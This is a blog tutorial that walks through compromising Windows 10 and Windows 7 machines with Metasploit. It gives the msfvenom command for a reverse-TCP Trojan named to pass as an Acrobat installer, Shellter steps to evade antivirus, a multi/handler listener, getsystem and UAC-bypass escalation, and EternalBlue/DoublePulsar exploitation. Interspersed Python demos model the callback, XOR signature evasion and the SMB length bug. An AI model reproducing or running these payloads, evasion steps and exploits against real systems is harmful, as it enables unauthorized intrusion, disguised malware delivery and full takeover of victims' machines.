Saturday, September 28, 2019

Metasploit Windows 10

Hacking into Windows 10 Using Metasploit Framework

Hackers are always seeking exploits and payloads that can bypass Windows 10's security features. There has been extensive research into creating undetectable malware, and entire GitHub projects are dedicated to automating the creation of undetectable payloads, such as WinPayloads, Veil v3 and TheFatRat.
A Trojan or backdoor gives us remote access to the target box. Here we use the reverse_tcp payload: a specially crafted piece of malware that, when run on the victim machine, opens a connection back to the attacker's machine over the Transmission Control Protocol. Because the victim initiates the outbound connection, it normally passes through NAT and through firewalls that only filter inbound traffic, and it gives the attacker control of the machine.
The Metasploit Framework is one of the best tools in Kali Linux. It provides both the handler and the payload generator. Once the payload executes on the target while our handler is listening, it spawns a Meterpreter session, which lets us interact with the target system and run shell commands; compared with a plain shell, Meterpreter offers far more options. This works whether the target is on the same LAN or out on the internet; the only difference is that for the internet case you must forward the listening port on your router and set LHOST in the payload to your public IP. The process is simple. Follow the steps.
The Metasploit Framework is the most widely used exploitation framework. It lets an attacker set up a listener that receives the connection from a compromised machine and controls it through a Meterpreter session. We shall do this through a malicious executable file prepared with Shellter.
THIS ARTICLE ASSUMES THE INSTALLATION OF KALI LINUX HAS BEEN DONE AND IS REACHABLE THROUGH A BRIDGED CONNECTION FROM A WINDOWS MACHINE ON VMWARE.
Generating a Malicious .exe file
Generate the payload using msfvenom, setting the port to 4444 and the IP to your local IP (target on the same LAN) or your public IP (target on the internet). The generated Trojan will try to connect to this IP and port when it is executed. The following command generates the Trojan in .exe format.
To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet):
ifconfig eth0
With that address as LHOST, generate the Trojan with the msfvenom command below. The -o option writes it to /root/acrobatreaderpro.exe; keep it aside and move on to the handler section.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.11.118 LPORT=4444 -o /root/acrobatreaderpro.exe
The command above instructs msfvenom to generate a 32-bit (x86) Windows executable that carries the staged Meterpreter reverse TCP payload. The format is specified as exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, LHOST is the IP address of our attacking Kali Linux machine and LPORT is the port on which our handler will listen for the connection from the target once it has been compromised.
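To make the reverse connection concrete, here is an added example (not code from the original article and not Metasploit's own protocol) that models what windows/meterpreter/reverse_tcp does on the wire: the target side dials out to LHOST:LPORT, the handler accepts and then drives the session. Both sides run as threads on 127.0.0.1 so it works offline; the length-prefixed framing and the two-command "shell" (sysinfo, pwd) are an assumed stand-in for the real Meterpreter protocol.

```python
"""Model of a reverse TCP callback: the victim connects OUT to the handler,
which is why it passes NAT and firewalls that only filter inbound traffic."""
import os
import platform
import socket
import struct
import threading


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP may deliver one frame in several pieces."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def send_frame(sock: socket.socket, data: bytes) -> None:
    """Frame = 4-byte big-endian length followed by the payload bytes."""
    sock.sendall(struct.pack(">I", len(data)) + data)


def recv_frame(sock: socket.socket) -> bytes:
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    return recv_exact(sock, length)


# Hypothetical command set standing in for Meterpreter's sysinfo / pwd.
COMMANDS = {
    "sysinfo": platform.platform,
    "pwd": os.getcwd,
}


def target_callback(lhost: str, lport: int) -> None:
    """Victim side: connect back to the handler and answer commands until 'exit'."""
    with socket.create_connection((lhost, lport)) as s:
        while True:
            cmd = recv_frame(s).decode()
            if cmd == "exit":
                send_frame(s, b"bye")
                return
            fn = COMMANDS.get(cmd)
            reply = fn() if fn else f"unknown command: {cmd}"
            send_frame(s, reply.encode())


def run_handler(commands, lhost: str = "127.0.0.1") -> dict:
    """Attacker side (the multi/handler analogue): listen on LHOST:LPORT,
    accept the callback, then send each command and collect its reply.
    Port 0 lets the OS pick a free port so the demo never collides with
    a real listener."""
    results = {}
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind((lhost, 0))
        listener.listen(1)
        lport = listener.getsockname()[1]
        # In the lab the Trojan is double-clicked on Windows; a thread stands in for it here.
        victim = threading.Thread(target=target_callback, args=(lhost, lport), daemon=True)
        victim.start()
        conn, _peer = listener.accept()
        with conn:
            for cmd in commands:
                send_frame(conn, cmd.encode())
                results[cmd] = recv_frame(conn).decode()
            send_frame(conn, b"exit")
            recv_frame(conn)
        victim.join(timeout=5)
    return results


if __name__ == "__main__":
    for cmd, reply in run_handler(["sysinfo", "pwd", "getuid"]).items():
        print(f"{cmd}: {reply}")
```

The order matters exactly as in the Metasploit procedure: the listener must be up before the payload runs, otherwise the callback is refused and the real staged payload simply exits.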
Antivirus solutions work largely by detecting known malicious byte signatures within executables, and raw msfvenom output is among the most heavily signatured files there are, so our file will be flagged as soon as it lands in the Windows environment. We therefore have to modify it to evade antivirus detection. The goal is to make it "fully undetectable", or FUD; bear in mind that FUD only ever holds against the scanners and signature sets tested at the time, since vendors add signatures for new samples and also detect behaviour such as the outbound connection.

Making the Executable FUD (Fully Undetectable)

To do this we use Shellter. Shellter is a dynamic shellcode injection tool: rather than encoding the msfvenom file itself, it injects the chosen payload into a legitimate 32-bit Windows executable, so the resulting file keeps the host program's structure and no longer carries the byte patterns that antivirus signatures match on the raw payload.
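The two paragraphs above rest on one idea: a static signature matches bytes verbatim, so changing the bytes defeats it. The added example below (not from the original article and not Shellter's own code) shows a toy signature scan catching a constructed placeholder "payload", missing the same payload once it is XOR-encoded inside a benign-looking host, and then the decoder-aware check a scanner can use to catch single-byte XOR anyway. The payload bytes and signature are made up for the demo (not shellcode), and the XOR step stands in for the encoding or injection an evasion tool performs; it is not how Shellter works.

```python
"""Static signature matching versus a trivially encoded payload."""

# Constructed stand-in for the stager bytes msfvenom emits (NOT real shellcode).
RAW_PAYLOAD = b"\x90\x90\x90\x90" + b"DEMO_STAGER:reverse_tcp" + b"\x00" * 8

# A signature database as a vendor would ship it: detection name -> byte pattern.
SIGNATURES = {
    "Demo.Stager.ReverseTCP": b"\x90\x90\x90\x90DEMO_STAGER",
}


def scan_static(blob: bytes) -> list:
    """Plain signature scan: which known patterns occur verbatim in the file?"""
    return [name for name, pattern in SIGNATURES.items() if pattern in blob]


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR 'encoder'; it is its own inverse, so decode == encode."""
    return bytes(b ^ key for b in data)


def build_trojan(payload: bytes, key: int) -> bytes:
    """Model of the delivered file: a benign-looking host, then a one-byte key
    and the encoded payload that a decoder stub would restore at run time."""
    host_stub = b"MZ" + b"\x00" * 58 + b"benign host program code"  # placeholder
    return host_stub + bytes([key]) + xor_encode(payload, key)


def scan_with_xor_bruteforce(blob: bytes) -> list:
    """Decoder-aware scan: try all 256 single-byte keys and re-scan. This is a
    miniature of what antivirus emulators/unpackers do; it defeats trivial
    encoding but not rolling keys or genuine polymorphic injection."""
    hits = []
    for key in range(256):
        for name in scan_static(xor_encode(blob, key)):
            hits.append((name, key))
    return hits


if __name__ == "__main__":
    trojan = build_trojan(RAW_PAYLOAD, key=0x5A)
    print("raw payload   :", scan_static(RAW_PAYLOAD))
    print("encoded file  :", scan_static(trojan))
    print("xor-aware scan:", scan_with_xor_bruteforce(trojan))
```

The practical lesson is the same one the article's FUD claim hides: a scanner that only matches bytes is beaten by any encoding, a scanner that decodes or emulates catches cheap encodings again, and the reliable defender-side signal is the payload's behaviour after decoding (the outbound connection), which no static rewriting removes.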
Use the command below to install Shellter. Shellter is a Windows binary and runs under Wine on Kali.
sudo apt-get install shellter
To launch Shellter, type shellter in the terminal.
You will be prompted for the absolute path of the executable to inject into; this should be a legitimate 32-bit Windows program, and Shellter backs up the original before modifying it. Make sure to select "Auto" mode.
Shellter will then initialize and run some checks. It will then ask whether to enable stealth mode, which keeps the host program working normally after the payload runs so the user sees nothing unusual. Select "Y" for yes.
The next prompt asks whether to use a custom or a listed payload. Type "L" for a listed one, unless you want to proceed with your own custom payload. Then select the index of the payload to use; we need Meterpreter_Reverse_TCP, so we go with "1".
Enter LHOST and LPORT and press Enter. Shellter will run to completion and ask you to press Enter.
At this point the executable you provided contains the payload and should pass the signature-based scanning of most antivirus products. Detection varies by product and signature version, so verify the file against the same antivirus the target runs before relying on it.
We now need to set up a listener on the port we set within the executable. Launch Metasploit with the command msfconsole in the Kali Linux terminal and issue the commands below (the screenshot shows the same sequence).
First, tell Metasploit to use the generic payload handler:
use multi/handler
Then set the payload to match the one set within the executable, followed by LHOST and LPORT:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.118
set LPORT 4444
Once done, type run or exploit and press Enter. The reverse TCP handler should begin waiting for a connection (see the screenshot of the output).
The next step is to execute the file from the Windows side. In a real-world situation this requires social engineering. For this lab, I uploaded acrobatreaderpro.exe to Drive and copied it to a Windows system on the same network as the Kali system.

Executing the Payload

Execute the payload on the target machine. The executable runs the payload, which connects back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux box.

Privilege Escalation

Privilege escalation lets us move from our less privileged user to a more privileged one, ideally NT AUTHORITY\SYSTEM, which has full administrative rights.
On the Meterpreter prompt we use the getsystem command:
getsystem
With these privileges we can do quite a lot on our compromised target. For instance, we can list the active processes, access system folders and dump password hashes, or create a directory and upload further malware, ransomware or other payloads.
Now that we are within the target machine, why not perform some persistence to remain within?

Persistence

Persistence allows us to regain access to the machine whenever we need to, even after the target patches the vulnerability or deletes the original Trojan.
There are many ways to establish persistence. For example, we can make the implant connect back to us whenever the target turns on the machine (a backdoor), or create our own user account on the compromised machine. Metasploit also provides its own persistence modules.
If all of the techniques that getsystem tries fail, we need another way to elevate privileges. We will use the bypassuac_comhijack local exploit module, which bypasses User Account Control (UAC). Note that a UAC bypass only helps when the current user is a member of the local Administrators group: it turns that user's filtered, medium-integrity token into a high-integrity one and does nothing for a standard user. To use it, we background our Meterpreter session, switch from multi/handler to the module, and point it at the backgrounded session with set SESSION 2 (use the session ID that sessions -l reports):
background
use exploit/windows/local/bypassuac_comhijack
set SESSION 2
We then set the payload, LHOST and LPORT and run the exploit. The payload architecture must match the target, which is why the article uses windows/x64/meterpreter/reverse_tcp here; pick an LPORT that the first handler is not already using, for example 4445:
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.11.118
set LPORT 4445
exploit
In our case the module reported a failure, since we had already gained access to the target box. In the usual case you receive a new Meterpreter session. Typing sysinfo shows information about the target. getuid shows that you are running as a normal user on Windows 10, but you can elevate to SYSTEM by issuing getsystem; confirm that the elevation succeeded by issuing getuid again, which now reports NT AUTHORITY\SYSTEM.
You can list the processes on the target box, browse the system folders, create a directory and upload a Trojan.

Conclusion

Attackers are not limited in what they can use the framework for. For instance, it can also perform information gathering and pivoting through compromised networks. Since our whole objective here was to create an undetectable payload, signature-based antivirus alone is not a reliable defence against Trojanized executables of this kind.
One thing you can do is scrutinize every file you download from the internet before running it. In this article we have seen how the Metasploit Framework can be used to compromise a Windows 10 machine and gain a Meterpreter session. We used Shellter to make our malicious executable FUD and bypass the Windows 10 antivirus, then performed privilege escalation to gain more rights on the compromised machine.

EternalBlue SMB Exploit

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by the Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run repeatedly until it triggers. The pool seems to get hot streaks and need a cool-down period before the shells rain in again.
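The "DWORD into a WORD" error in the module description is easier to see in a small model than in the srv.sys disassembly. The added example below (not from the original article or the Metasploit module) builds an OS/2-style FEA list whose 32-bit cbList header is attacker-supplied, walks the entries the way the server does to find out how much data is really present, and then compares the buggy 16-bit store of that recomputed length with the correct 32-bit store. The structure layout, the NT size formula and the numbers are illustrative assumptions, not the real srv.sys code; the point is only how the high word of the attacker's length survives and drives the copy loop past the allocation.

```python
"""Model of a size recomputation stored through a 16-bit write."""
import struct


def build_fea_list(entries, claimed_cblist: int) -> bytes:
    """Pack a FEA list: u32 cbList, then entries of
    u8 flags, u8 name_len, u16 value_len, name, value (little-endian).
    The header value is whatever the client claims, not what it sent."""
    body = b""
    for name, value in entries:
        body += struct.pack("<BBH", 0, len(name), len(value)) + name + value
    return struct.pack("<I", claimed_cblist) + body


def walk_entries(fea_list: bytes) -> tuple:
    """Walk the entries that are really present (the size pass).
    Returns (bytes_parsed, nt_bytes_needed); 12 is an assumed per-entry
    NT header overhead for the converted list."""
    off = 4
    nt_size = 0
    while off + 4 <= len(fea_list):
        _flags, name_len, value_len = struct.unpack_from("<BBH", fea_list, off)
        entry_len = 4 + name_len + value_len
        if off + entry_len > len(fea_list):
            break
        off += entry_len
        nt_size += 12 + name_len + value_len
    return off - 4, nt_size


def update_cblist_buggy(claimed: int, parsed: int) -> int:
    """The bug: the 32-bit recomputed length is written as a WORD, so bits
    16..31 of the attacker-supplied value are kept."""
    return (claimed & 0xFFFF0000) | (parsed & 0xFFFF)


def update_cblist_fixed(claimed: int, parsed: int) -> int:
    """Correct behaviour: the recomputed length replaces the claim entirely."""
    return parsed


def convert_to_nt(fea_list: bytes, update) -> dict:
    """Model of the conversion: allocate from the walk, then let the copy
    loop trust cbList. Every byte cbList promises beyond what was parsed is
    phantom data the loop reads past the request and writes past the
    allocation (one byte per byte in this model; the real overwrite depends
    on how the garbage parses, which is why the exploit grooms the pool)."""
    claimed = struct.unpack_from("<I", fea_list, 0)[0]
    parsed, nt_alloc = walk_entries(fea_list)
    cblist = update(claimed, parsed)
    phantom = max(0, cblist - parsed)
    return {"claimed": claimed, "parsed": parsed, "cblist": cblist,
            "nt_alloc": nt_alloc, "overflow_bytes": phantom}


if __name__ == "__main__":
    entries = [(b"EA1", b"v" * 10), (b"EA2", b"w" * 10)]   # 34 bytes of real entries
    honest = build_fea_list(entries, 34)
    evil = build_fea_list(entries, 0x10000 + 34)           # high word set by the attacker
    print("honest, buggy :", convert_to_nt(honest, update_cblist_buggy))
    print("evil,   buggy :", convert_to_nt(evil, update_cblist_buggy))
    print("evil,   fixed :", convert_to_nt(evil, update_cblist_fixed))
```

With the buggy update the evil list keeps cbList = 0x10022 even though only 34 bytes of entries exist, so the loop has 64 KiB of phantom data to convert into a buffer sized for 50; with the fixed update cbList collapses to 34 and nothing is overrun. The fix is exactly the kind MS17-010 delivers: make the stored length the same width as the computed one.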
Let's start!
Attacker: Kali Linux
Target: Windows 7
Open a terminal in Kali Linux and type msfconsole to load the Metasploit Framework. Load the module (exploit/windows/smb/ms17_010_eternalblue), set the target address (RHOSTS) to the Windows 7 machine and run it.
From the screenshot you can see we got a Meterpreter session after the buffer overflow was exploited by overwriting the SMBv1 buffer.
As seen above, the Windows 7 system is now compromised.

EternalBlue DoublePulsar Exploit through Metasploit Windows 7

WINDOWS 7 REMOTE EXPLOITATION WITH ETERNALBLUE & DOUBLEPULSAR EXPLOIT THROUGH METASPLOIT

EternalBlue is the exploit used by the WannaCry ransomware and is among the National Security Agency (NSA) exploits leaked by the Shadow Brokers group. It exploits a remote code execution vulnerability in Windows SMBv1. Microsoft released the MS17-010 patch to address the vulnerability EternalBlue exploits. EternalBlue sends crafted SMB packets over multiple TCP connections to exploit a target machine. It is used alongside DoublePulsar, a kernel-mode backdoor implant: EternalBlue gains code execution and installs DoublePulsar, which the attackers then use to inject secondary malware into a process on the victim's system. DoublePulsar is memory-resident, so it gives the attacker a foothold until the machine reboots rather than true persistence.
This article describes the use of EternalBlue and DoublePulsar to hack into a Windows 7 machine, using Metasploit on a Kali Linux machine. Both machines are virtual machines; to determine their IP addresses, issue the following command on the Windows target:
ipconfig
And run the following command on the Kali Machine
ifconfig
The IP addresses of the two machines are 192.168.43.104 (Windows target) and 192.168.43.45 (Kali) respectively. For the attack to succeed, port 445 must be reachable on the target host, which a port scan will confirm (for example nmap -p 445 192.168.43.104). To ensure that our Kali machine is up to date we run the following command:
apt-get update -y && apt-get upgrade -y
We now download the scanner and the exploit and add them to Metasploit. Issue the following commands on the attacking machine:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
We now move the file smb_ms17_010.rb into the folder /usr/share/metasploit-framework/modules/auxiliary/scanner/smb (on a current Kali this scanner already ships with Metasploit and the step can be skipped).
We then copy eternalblue_doublepulsar.rb and the deps folder to /usr/share/metasploit-framework/modules/exploits/windows/smb. Next we open eternalblue_doublepulsar.rb with any editor and change the default paths for ETERNALBLUE and DOUBLEPULSAR to the smb exploit directory, /usr/share/metasploit-framework/modules/exploits/windows/smb, so the module can find the binaries in deps. We also specify the name of the process to inject into, which we have set here to explorer.exe. The module runs the leaked Windows binaries through Wine, so 32-bit Wine must be installed on Kali. Then we launch msfconsole and use the auxiliary scanner module smb_ms17_010:
 use auxiliary/scanner/smb/smb_ms17_010
Then we run the following commands to determine our various options:
show options
We now setup RHOSTS IP which is the Victims IP address.
set RHOSTS 192.168.43.104
After doing that, we run the exploit with the run command:
run
Upon running the scanner, it checks whether the host is vulnerable and displays details of the victim machine.

Next we move to the exploit EternalBlue and DoublePulsar with the following commands:
use exploit/windows/smb/eternalblue_doublepulsar

set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.43.104
set LHOST 192.168.43.45
set targetarchitecture x86
After setting all the above options with the above commands, we now run the exploit, by issuing this command:
exploit
And lo and behold we have a meterpreter shell in Windows 7.
To confirm that our attack is successful we issue the command:
sysinfo
This will return information about the target machine.